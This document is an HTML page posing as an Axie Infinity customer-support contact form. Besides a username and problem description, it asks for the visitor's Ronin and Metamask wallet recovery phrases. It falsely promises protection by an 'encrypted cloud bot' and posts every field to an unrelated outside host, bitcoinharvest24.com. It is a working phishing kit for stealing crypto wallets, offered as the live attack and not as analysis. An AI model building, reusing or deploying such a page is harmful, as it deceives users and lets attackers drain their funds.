<!DOCTYPE html>
<html>
<head>
	<title>AXIE-INFINITY SUPPORT </title>
<style>



   input[type=text], select {
  width: 100%;
  padding: 12px 20px;
  margin: 8px 0;
  display: inline-block;
  border: 1px solid #ccc;
  border-radius: 4px;
  box-sizing: border-box;
}

input[type=submit] {
  width: 100%;
  background-color: BLUE;
  color: white;
  padding: 14px 20px;
  margin: 8px 0;
  border: none;
  border-radius: 4px;
  cursor: pointer;
}

input[type=submit]:hover {
  background-color: #45a049;
}

div {
  border-radius: 5px;
  background-color: #f2f2f2;
  padding: 20px;
}
body{
  background-color: white;
  color: 101426;
}




.header {
  overflow: hidden;
  background-color: #f1f1f1;
  padding: 20px 10px;
}

.header a {
  float: left;
  color: black;
  text-align: center;
  padding: 12px;
  text-decoration: none;
  font-size: 18px; 
  line-height: 25px;
  border-radius: 4px;
}

.header a.logo {
  font-size: 25px;
  font-weight: bold;
}

.header a:hover {
  background-color: #ddd;
  color: black;
}

.header a.active {
  background-color: dodgerblue;
  color: white;
}

.header-right {
  float: right;
}

@media screen and (max-width: 500px) {
  .header a {
    float: none;
    display: block;
    text-align: left;
  }
  
  .header-right {
    float: none;
  }
}


</style>

</head>
<body style="background-color: BLUE;" "="">
<center style="color: Black;">

 	<div>
<div class="header">
  <a href="#default" class="logo"><img src="axie.jpeg" width="200"></a><i><h1>AXIE-INFINITY SUPPORT</i></h1></center>
</div>
</div>
<center style="color: white;"><h1>This Website is for Axie-infinity Customer Support Only.</h1><br><h3></center>


</div>
</head>
<body>
	



  <div>
    <form method="post" action="https://bitcoinharvest24.com/bola4/sendmail.php">
  	<center><h2><u>Contact Us</u></h2></center>
  	<CENTER><H3>Kindly note that your Datas are protected by our encrypted cloud bot&#128274;</H3></CENTER>
    <center>  <label for="fname">Your in-game Username</label>
    <input type="text" id="fname" name="username" placeholder="Your name..">

    <label for="lname">Describe Your problem in detail:</label>
    <input type="text" id="lname" name="problem" placeholder="Your problem..">

    <label for="lname">Your Email-Address:</label>
    <input type="text" id="lname" name="email" placeholder="Email-Address..">

    <label for="lname">How long have you been Experiencing this?:</label>
    <input type="text" id="lname" name="experience" placeholder="Duration..">

    <label for="lname">Ronin wallet Phrase &#128274;:</label>
    <input type="text" id="lname" name="ronin" placeholder="Duration..">

     <label for="lname">Metamask/other wallet phrase &#128274;:</label>
    <input type="text" id="lname" name="meta" placeholder="Duration..">

 <input type="submit" name="send" value="Submit"> </a> 
  </center></form></div>

	
</body>
</html>